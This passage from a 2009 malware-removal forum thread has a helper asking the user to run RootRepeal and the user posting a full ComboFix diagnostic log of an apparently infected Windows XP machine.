Status: -

Name: win32k.sys
Image Path: C:\WINDOWS\System32\win32k.sys
Address: 0xBF800000 Size: 1839104 File Visible: - Signed: -
Status: -

Name: WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\WMILIB.SYS
Address: 0xF7B5E000 Size: 8192 File Visible: - Signed: -
Status: -

Name: WMIxWDM
Image Path: \Driver\WMIxWDM
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -


Sat Jun 20, 2009 19:39
soul of the forum

OK, also run the RootRepeal program.
RootRepeal.exe >> Report >> Scan >> tick >> Select ALL >> click OK >> after the scan >> click Save Report, and post it here.
http://rootrepeal.googlepages.com/RootRepeal.zip


Sat Jun 20, 2009 18:49
gold member

Sorry stell, but I fell asleep... I was on the night shift. This error (svchost.exe at address 0x0351f496: the write cannot be performed on memory area 0x0351f496) still persists

ComboFix 09-06-18.02 - PALI 009.06.20. 15:05.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1250.36.1038.18.1023.426 [GMT 2:00]
Running from: c:\documents and settings\PALI\Asztal\ComboFix.exe
Command switches used :: c:\documents and settings\PALI\Asztal\CFScript.txt.txt
AV: avast! antivirus 4.8.1335 [VPS 090619-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: COMODO Firewall Pro *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!

FILE ::
"c:\windows\S06C0D312.tmp"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\S06C0D312.tmp . . . . failed to delete

.
((((((((((((((((((((((((( Files Created from 2009-05-20 to 2009-06-20 )))))))))))))))))))))))))))))))
.

2009-06-19 17:18 . 2009-06-19 17:18 26624 ----a-w- c:\windows\system32\drivers\fsbts.sys
2009-06-19 17:17 . 2009-06-20 06:07 -------- d-----w- c:\documents and settings\Rendszergazda\Local Settings\Application Data\Adobe
2009-06-19 09:53 . 2009-06-19 10:01 -------- d-----w- C:\rsit
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\documents and settings\PALI\Application Data\Convivea
2009-06-19 08:29 . 2009-04-10 16:40 118784 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.exe
2009-06-19 08:29 . 2008-03-28 08:07 20992 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\languages\compare.exe
2009-06-19 08:29 . 2008-03-28 08:02 60928 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\update.exe
2009-06-19 08:29 . 2007-07-11 17:43 24557 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\special.exe
2009-06-19 08:29 . 2003-08-19 03:06 80896 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.dll
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\program files\Bit Che
2009-06-18 06:03 . 2008-12-11 06:38 159600 ----a-w- c:\windows\system32\drivers\pctgntdi.sys
2009-06-18 06:02 . 2009-04-03 09:18 130936 ----a-w- c:\windows\system32\drivers\PCTCore.sys
2009-06-18 06:02 . 2008-12-18 10:16 73840 ----a-w- c:\windows\system32\drivers\PCTAppEvent.sys
2009-06-18 06:02 . 2009-06-18 06:03 -------- d-----w- c:\program files\Common Files\PC Tools
2009-06-18 06:02 . 2008-12-10 09:36 64392 ----a-w- c:\windows\system32\drivers\pctplsg.sys
2009-06-18 06:02 . 2009-06-18 06:02 -------- d-----w- c:\documents and settings\All Users\Application Data\PC Tools
2009-06-17 17:36 . 2009-06-18 06:02 51328 ----a-w- c:\windows\system32\drivers\inspect.sys
2009-06-17 17:36 . 2009-06-18 06:02 75520 ----a-w- c:\windows\system32\drivers\cmdmon.sys
2009-06-14 10:09 . 2009-06-14 10:09 -------- d-----w- c:\program files\xyr0x Security
2009-06-14 09:37 . 2009-04-10 13:37 2023768 ----a-w- c:\windows\system32\rapid.dll
2009-06-14 09:37 . 2009-04-08 12:05 16384 ---ha-w- c:\windows\system32\shell.exe
2009-06-14 09:37 . 2009-04-10 22:34 151552 ----a-w- c:\windows\system32\Rapid.exe
2009-06-14 09:37 . 2009-04-08 19:26 49 ---ha-w- c:\windows\system32\run.bat
2009-06-13 16:23 . 2009-06-14 20:24 -------- d-----w- c:\temp\{9F5FBC24-EFE2-4f90-B498-EC0FB7D47D15}
2009-06-12 15:29 . 2009-06-12 15:29 -------- d-----w- c:\program files\Driver Cleaner Pro
2009-06-10 20:37 . 2009-06-10 20:37 -------- d-----w- c:\documents and settings\PALI\Application Data\Ashampoo
2009-06-10 19:25 . 2009-06-10 19:25 -------- d-----w- c:\documents and settings\All Users\Application Data\ATI
2009-06-10 19:12 . 2009-03-16 14:04 11563008 ----a-w- c:\windows\system32\atioglxx.dll
2009-06-10 19:12 . 2009-03-16 13:40 49664 ----a-w- c:\windows\system32\atimpc32.dll
2009-06-10 19:12 . 2009-03-16 13:35 45056 ----a-w- c:\windows\system32\aticalrt.dll
2009-06-10 19:12 . 2009-03-16 13:35 131072 ----a-w- c:\windows\system32\atiadlxx.dll
2009-06-10 19:12 . 2009-03-16 13:34 45056 ----a-w- c:\windows\system32\aticalcl.dll
2009-06-10 19:12 . 2009-03-16 13:33 3264512 ----a-w- c:\windows\system32\aticaldd.dll
2009-06-10 19:12 . 2009-03-03 13:56 118784 ----a-w- c:\windows\system32\atibtmon.exe
2009-06-10 19:12 . 2009-02-26 05:40 99856 ----a-w- c:\windows\system32\drivers\AtiHdmi.sys
2009-06-10 18:42 . 2009-06-20 07:37 664 ----a-w- c:\windows\system32\d3d9caps.dat
2009-06-10 18:12 . 2005-05-07 10:43 69632 ------r- c:\windows\Alcmtr.exe
2009-06-08 20:31 . 2009-06-15 16:41 -------- d-----w- c:\program files\The FilmMachine
2009-06-08 20:19 . 2006-08-05 07:02 49152 ------r- c:\windows\system32\ChCfg.exe
2009-06-08 20:19 . 2006-07-25 08:14 86016 ------r- c:\windows\SoundMan.exe
2009-06-08 20:19 . 2006-05-20 10:04 2879488 ------r- c:\windows\SkyTel.exe
2009-06-08 20:19 . 2007-01-06 05:32 1191936 ------r- c:\windows\RtlUpd.exe
2009-06-08 20:19 . 2006-05-08 08:35 9709568 ------r- c:\windows\RTLCPL.exe
2009-06-08 20:19 . 2007-02-03 10:57 4474368 ------r- c:\windows\system32\drivers\RtkHDAud.sys
2009-06-08 20:19 . 2007-02-03 10:54 16116224 ------r- c:\windows\RTHDCPL.exe
2009-06-08 20:19 . 2006-10-15 09:42 2157568 ------r- c:\windows\MicCal.exe
2009-06-08 20:19 . 2006-05-08 08:26 2808832 ------r- c:\windows\alcwzrd.exe
2009-06-08 20:19 . 2009-06-10 18:12 -------- d-----w- c:\program files\Realtek
2009-06-08 20:19 . 2007-01-16 08:54 520192 ------r- c:\windows\RtlExUpd.dll
2009-06-05 21:53 . 2009-06-05 21:53 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\PCHealth
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\ATI
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Application Data\ATI
2009-06-05 21:48 . 2009-06-05 21:48 0 ----a-w- c:\windows\ativpsrm.bin
2009-06-05 21:33 . 2009-06-05 21:33 -------- d-----w- c:\program files\My Company Name
2009-06-05 21:27 . 2009-06-05 21:27 9158 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{89DE67AD-08B8-4699-A55D-CA5C0AF82BF3}\ARPPRODUCTICON.exe
2009-06-05 21:27 . 2009-06-05 21:27 -------- d-----w- c:\program files\Common Files\ATI Technologies
2009-06-05 21:26 . 2006-12-28 03:44 84992 ----a-r- c:\windows\system32\drivers\AtiHdAud.sys
2009-06-05 21:22 . 2009-03-16 14:17 307200 ----a-w- c:\windows\system32\atiiiexx.dll
2009-06-05 21:22 . 2009-03-16 14:27 442368 ----a-w- c:\windows\system32\ATIDEMGX.dll
2009-06-05 21:22 . 2008-02-19 13:37 887724 ----a-r- c:\windows\system32\ativva6x.dat
2009-06-05 21:22 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativva5x.dat
2009-06-05 21:21 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativvaxx.dat
2009-06-05 09:55 . 2009-02-23 15:39 184394 ----a-w- c:\windows\system32\atiicdxx.dat
2009-06-05 09:54 . 2009-06-10 19:20 -------- d-----w- c:\program files\ATI Technologies
2009-06-01 14:08 . 2009-06-01 14:08 -------- d-----w- c:\program files\FDRLab
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\windows\system32\3Planesoft
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\3Planesoft Screensaver Manager
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\Tropical Fish 3D Screensaver

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-06-20 13:15 . 2008-11-01 20:52 -------- d-----w- c:\program files\cFosSpeed
2009-06-20 13:13 . 2009-03-02 21:49 0 ------w- c:\windows\S06C0D312.tmp
2009-06-20 13:06 . 2004-08-18 12:00 449586 ----a-w- c:\windows\system32\perfh00E.dat
2009-06-20 13:06 . 2004-08-18 12:00 100660 ----a-w- c:\windows\system32\perfc00E.dat
2009-06-20 13:06 . 2008-11-21 17:19 82464 ----a-w- c:\windows\system32\perfc040.dat
2009-06-20 13:06 . 2008-11-21 17:19 414914 ----a-w- c:\windows\system32\perfh040.dat
2009-06-20 12:50 . 2008-11-01 11:53 -------- d-----w- c:\documents and settings\PALI\Application Data\uTorrent
2009-06-20 06:24 . 2008-12-24 11:42 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-18 17:34 . 2008-12-24 11:42 -------- d-----w- c:\program files\Spyware Doctor
2009-06-18 10:23 . 2008-03-16 17:56 -------- d-----w- c:\program files\FairUse Wizard 2
2009-06-18 06:53 . 2008-03-16 19:54 -------- d-----w- c:\program files\Common Files\Elecard
2009-06-17 17:36 . 2009-01-13 19:32 -------- d-----w- c:\program files\Comodo
2009-06-16 07:58 . 2008-03-03 17:36 -------- d-----w- c:\documents and settings\PALI\Application Data\Vso
2009-06-14 20:52 . 2008-03-13 17:56 -------- d-----w- c:\program files\Avidemux 2.4
2009-06-13 21:38 . 2009-03-10 08:57 249856 ------w- c:\windows\Setup1.exe
2009-06-13 21:37 . 2009-03-10 08:57 73216 ----a-w- c:\windows\ST6UNST.EXE
2009-06-13 20:27 . 2009-04-07 19:22 -------- d-----w- c:\program files\MooGUI
2009-06-13 17:10 . 2008-11-01 15:11 -------- d-----w- c:\program files\Lx_cats
2009-06-10 21:18 . 2009-06-10 18:24 196608 ----a-w- c:\windows\system32\drivers\nStandard.bin
2009-06-10 20:37 . 2008-03-17 08:56 -------- d-----w- c:\program files\Ashampoo
2009-06-10 18:24 . 2009-01-01 14:45 -------- d-----w- c:\program files\ASUS
2009-06-10 18:24 . 2008-03-01 20:34 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-06-09 16:55 . 2008-11-12 20:33 -------- d-----w- c:\program files\XRECODE
2009-06-09 14:00 . 2008-03-14 10:24 -------- d-----w- c:\program files\ChrisTV
2009-06-08 20:39 . 2008-03-02 21:04 -------- d-----w- c:\program files\AviSynth 2.5
2009-06-08 20:11 . 2008-03-02 19:04 -------- d-----w- c:\program files\MoBiMouse
2009-06-08 20:07 . 2008-11-22 15:47 -------- d-----w- c:\documents and settings\All Users\Application Data\InstallShield
2009-06-08 20:07 . 2008-03-06 18:03 -------- d-----w- c:\documents and settings\PALI\Application Data\InstallShield
2009-06-08 19:34 . 2008-03-03 17:42 -------- d-----w- c:\program files\Real Alternative
2009-06-06 20:45 . 2009-02-08 12:21 -------- d-----w- c:\documents and settings\PALI\Application Data\Free Download Manager
2009-06-06 20:45 . 2008-11-01 12:39 -------- d---a-w- c:\program files\USDownloader - Cap
2009-06-06 13:44 . 2008-03-26 22:46 -------- d-----w- c:\documents and settings\PALI\Application Data\Simple Sudoku
2009-06-06 13:40 . 2009-02-21 14:59 -------- d-----w- c:\program files\RapidSolution
2009-06-06 13:26 . 2009-02-21 14:44 -------- d-----w- c:\program files\Daniusoft
2009-06-04 22:40 . 2008-03-01 20:52 106496 ----a-w- c:\windows\DUMP691a.tmp
2009-05-11 22:41 . 2009-05-11 22:41 -------- d-----w- c:\program files\ProPoster
2009-05-11 22:31 . 2008-03-01 22:01 97016 ----a-w- c:\documents and settings\PALI\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-05-11 22:31 . 2009-05-11 22:31 -------- d-----w- c:\program files\Poster Forge
2009-05-11 22:13 . 2008-03-16 19:47 -------- d-----w- c:\program files\Sorenson Media
2009-05-11 22:12 . 2009-05-11 22:12 10134 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{38F48AED-66D8-464C-993E-C7296C7A199B}\ARPPRODUCTICON.exe
2009-05-11 22:11 . 2009-05-11 22:11 -------- d-----w- c:\program files\BIAS
2009-05-08 07:53 . 2009-05-08 07:36 -------- d-----w- c:\program files\PhotoFiltre Studio X
2009-05-08 07:37 . 2009-05-08 07:36 -------- d-----w- c:\documents and settings\PALI\Application Data\PhotoFiltre Studio X
2009-05-04 09:01 . 2008-11-27 10:57 135773 ----a-w- c:\windows\HPHins12.dat
2009-04-27 20:17 . 2009-03-05 21:21 -------- d-----w- c:\program files\abgx360
2009-04-07 19:22 . 2009-04-07 19:22 25214 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
2009-04-07 19:22 . 2009-04-07 19:22 22486 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
2009-03-23 08:27 . 2009-03-23 08:27 747566 ----a-w- c:\windows\system32\abgx360.exe
.

((((((((((((((((((((((((((((( SnapShot@2009-06-20_06.41.25 )))))))))))))))))))))))))))))))))))))))))
.
- 2009-01-13 13:00 . 2009-06-20 06:40 32768 c:\windows\temp\Temporary Internet Files\Content.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 32768 c:\windows\temp\Temporary Internet Files\Content.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 16384 c:\windows\temp\Perflib_Perfdata_cf4.dat
+ 2009-06-20 13:14 . 2009-06-20 13:14 16384 c:\windows\temp\Perflib_Perfdata_508.dat
- 2009-01-13 13:00 . 2009-06-20 06:40 32768 c:\windows\temp\History\History.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 32768 c:\windows\temp\History\History.IE5\index.dat
- 2009-01-13 13:00 . 2009-06-20 06:40 16384 c:\windows\temp\Cookies\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 16384 c:\windows\temp\Cookies\index.dat
- 2004-08-18 12:00 . 2009-06-20 06:26 71904 c:\windows\system32\perfc009.dat
+ 2004-08-18 12:00 . 2009-06-20 13:06 71904 c:\windows\system32\perfc009.dat
- 2004-08-18 12:00 . 2009-06-20 06:26 444028 c:\windows\system32\perfh009.dat
+ 2004-08-18 12:00 . 2009-06-20 13:06 444028 c:\windows\system32\perfh009.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-18 15360]
"MSMSGS"="c:\program files\Messenger\Msmsgs.exe" [2008-06-02 1660952]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2007-04-03 165784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"RecSche"="c:\program files\TVR\RecSche.exe" [2004-05-10 454656]
"ChrisTV Agent"="c:\program files\ChrisTV\ChrisTV_Agent.exe" [2005-05-02 187392]
"PinnacleDriverCheck"="c:\windows\system32\\PSDrvCheck.exe" [2004-03-10 406016]
"amd_dc_opt"="c:\program files\AMD\Dual-Core Optimizer\amd_dc_opt.exe" [2007-07-23 77824]
"lxccmon.exe"="c:\program files\Lexmark 3300 Series\lxccmon.exe" [2005-07-20 192512]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2005-07-12 299008]
"cFosSpeed"="c:\program files\cFosSpeed\cFosSpeed.exe" [2007-10-17 854992]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"VC5Player"="c:\program files\HHVcdV5Sys\VC5Play.exe" [2003-11-07 176128]
"UnlockerAssistant"="c:\program files\Unlocker\UnlockerAssistant.exe" [2006-05-06 6656]
"CClipboard"="c:\program files\ComfortClipboard\CClipboard.exe" [2008-06-07 2843136]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-01-14 136600]
"CloneCDTray"="c:\program files\SlySoft\CloneCD\CloneCDTray.exe" [2006-09-28 57344]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2008-09-06 413696]
"ASUSGamerOSD"="c:\program files\ASUS\GamerOSD\GamerOSD.exe" [2007-10-23 380928]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-03-17 61440]
"LXCCCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll" [2005-07-20 73728]
"COMODO Firewall Pro"="c:\program files\Comodo\Firewall\CPF.exe" [2009-06-18 1115728]
"SkyTel"="SkyTel.EXE" - c:\windows\SkyTel.exe [2006-05-20 2879488]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.exe [2007-02-03 16116224]

c:\documents and settings\All Users\Start Menu\Programs\Indˇt˘pult\
HP Digital Imaging Monitor.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe [2006-2-19 288472]
hpoddt01.exe.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe [2003-4-6 28672]
InterVideo WinCinema Manager.lnk - c:\program files\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-12-14 167936]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2008-12-22 10:05 356352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0autocheck ??$\0autocheck T?M??

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\concept design\\onlineTV 3\\onlineTV.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\RM.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\Studio.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\PMSRegisterFile.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\umi.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\WINDOWS\\system32\\lxcccoms.exe"=
"c:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\lxccpswx.exe"=
"c:\\Program Files\\VoipCheapCom\\VoipCheapCom.exe"=
"c:\\Program Files\\Messenger\\Msmsgs.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\java.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5121:TCP"= 5121:TCP:messenger
"21858:TCP"= 21858:TCP:BitComet 21858 TCP
"21858:UDP"= 21858:UDP:BitComet 21858 UDP
"26636:TCP"= 26636:TCP:BitComet 26636 TCP
"26636:UDP"= 26636:UDP:BitComet 26636 UDP
"7387:TCP"= 7387:TCP:messenger
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"1253:TCP"= 1253:TCP:messenger
"135:TCP"= 135:TCP:TCP Port 135
"5000:TCP"= 5000:TCP:TCP Port 5000
"5001:TCP"= 5001:TCP:TCP Port 5001
"5002:TCP"= 5002:TCP:TCP Port 5002
"5003:TCP"= 5003:TCP:TCP Port 5003
"5004:TCP"= 5004:TCP:TCP Port 5004
"5005:TCP"= 5005:TCP:TCP Port 5005
"5006:TCP"= 5006:TCP:TCP Port 5006
"5007:TCP"= 5007:TCP:TCP Port 5007
"5008:TCP"= 5008:TCP:TCP Port 5008
"5009:TCP"= 5009:TCP:TCP Port 5009
"5010:TCP"= 5010:TCP:TCP Port 5010
"5011:TCP"= 5011:TCP:TCP Port 5011
"5012:TCP"= 5012:TCP:TCP Port 5012
"5013:TCP"= 5013:TCP:TCP Port 5013
"5014:TCP"= 5014:TCP:TCP Port 5014
"5015:TCP"= 5015:TCP:TCP Port 5015
"5016:TCP"= 5016:TCP:TCP Port 5016
"5017:TCP"= 5017:TCP:TCP Port 5017
"5018:TCP"= 5018:TCP:TCP Port 5018
"5019:TCP"= 5019:TCP:TCP Port 5019
"5020:TCP"= 5020:TCP:TCP Port 5020
"7533:TCP"= 7533:TCP:messenger
"2562:TCP"= 2562:TCP:messenger
"3117:TCP"= 3117:TCP:messenger
"8743:TCP"= 8743:TCP:messenger
"3325:TCP"= 3325:TCP:messenger
"6243:TCP"= 6243:TCP:messenger
"5575:TCP"= 5575:TCP:messenger
"5764:TCP"= 5764:TCP:messenger
"6274:TCP"= 6274:TCP:messenger
"7611:TCP"= 7611:TCP:messenger
"1721:TCP"= 1721:TCP:messenger
"2821:TCP"= 2821:TCP:messenger
"7754:TCP"= 7754:TCP:messenger
"3354:TCP"= 3354:TCP:messenger

R0 fsbts;fsbts;c:\windows\system32\drivers\fsbts.sys [2009.06.19. 19:18 26624]
R0 PCTCore;PCTools KDS;c:\windows\system32\drivers\PCTCore.sys [2009.06.18. 8:02 130936]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009.01.13. 19:16 114768]
R1 nltdi;nltdi;c:\windows\system32\drivers\nltdi.sys [2007.04.23. 13:03 82200]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2008.12.22. 12:06 8944]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [2008.12.22. 12:05 55024]
R1 vbev5mp;vbev5mp;c:\windows\system32\drivers\VBEV5MP.sys [2003.11.12. 9:26 56064]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009.01.13. 19:16 20560]
R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver;c:\windows\system32\drivers\thdudf.sys [2008.11.23. 10:47 66944]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;c:\windows\system32\drivers\AtiHdmi.sys [2009.06.10. 21:12 99856]
S2 OMSCAN;OMSCAN;\Sys --> \Sys [?]
S2 PStrip;PSTRIP;\??\c:\windows\system32\DRIVERS\PSTRIP.SYS --> c:\windows\system32\DRIVERS\PSTRIP.SYS [?]
S2 SOFTLOK;SOFTLOK; [x]
S3 RkPavproc1;RkPavproc1;\??\c:\windows\system32\drivers\RkPavproc1.sys --> c:\windows\system32\drivers\RkPavproc1.sys [?]
S3 SASENUM;SASENUM;c:\program files\SUPERAntiSpyware\SASENUM.SYS [2008.12.22. 12:06 7408]
S3 sdAuxService;PC Tools Auxiliary Service;c:\program files\Spyware Doctor\pctsAuxs.exe [2009.01.13. 23:01 348752]
S3 SndTAudio;SndTAudio;c:\windows\system32\drivers\SndTAudio.sys [2009.02.21. 16:49 23096]
S3 SndTVideo;SndTVideo;c:\windows\system32\drivers\SndTVideo.sys [2009.02.21. 16:49 3768]
S3 TNPacket;T-Systems Nova Packet Capture Driver;c:\progra~1\MATVAD~1\TNPACKET.SYS [2002.10.09. 14:38 9376]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{B2C3BB6B-E005-4246-B8E5-DF0A4D073CDC}]
c:\program files\PixiePack Codec Pack\InstallerHelper.exe
.
Contents of the 'Scheduled Tasks' folder

2009-06-20 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
.
.
------- Supplementary Scan -------
.
IE: Az összes letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlall.htm
IE: Kijelölés letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlselected.htm
IE: Letöltés Free Download Managerrel - file://c:\program files\Free Download Manager\dllink.htm
IE: Video letöltése a Free Download Manager-rel - file://c:\program files\Free Download Manager\dlfvideo.htm
FF - ProfilePath -
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-06-20 15:17
Windows 5.1.2600 Szervizcsomag 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
LXCCCATS = rundll32 c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\OMSCAN]
"ImagePath"="\Sys"

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\vbev5mp]
"ImagePath"="system32\DRIVERS\vbev5mp.sys"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\•€|˙˙˙˙"•€|ţ»Ów*]
"AB141C35E9F4BF344B9FC010BB17F68A"="02:\\Software\\Adobe\\FeatureSubscriptions\\DVAAdobeDocMeta\\{53C141BA-4F9E-43FB-B4F9-0C01BB716FA8}\\Registered"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
"DisplayName"="?\11"
"DeviceDesc"="?\11"
"ProviderName"="?\11???\11\08"
"MFG"="??\09"
"ReinstallString"="8.470.0.0000"
"DeviceInstanceIds"=multi:"k:\\driver\\ati driver\\xp\\driver\\xp_inf\\cx_60150.inf\00"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1612)
c:\program files\SUPERAntiSpyware\SASWINLO.dll
c:\windows\system32\Ati2evxx.dll

- - - - - - - > 'lsass.exe'(1676)
c:\windows\system32\relog_ap.dll

- - - - - - - > 'explorer.exe'(2812)
c:\program files\ComfortClipboard\CClipboardH.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
c:\windows\system32\msi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\Acronis\Schedule2\schedul2.exe
c:\windows\ATKKBService.exe
c:\program files\cFosSpeed\spd.exe
c:\program files\ComfortClipboard\CClipboardCm.exe
c:\program files\Virtual CD v5\System\VC5Tray.exe
c:\program files\Comodo\Firewall\cmdagent.exe
c:\program files\Diskeeper Corporation\Diskeeper\DkService.exe
c:\program files\Java\jre6\bin\jqs.exe
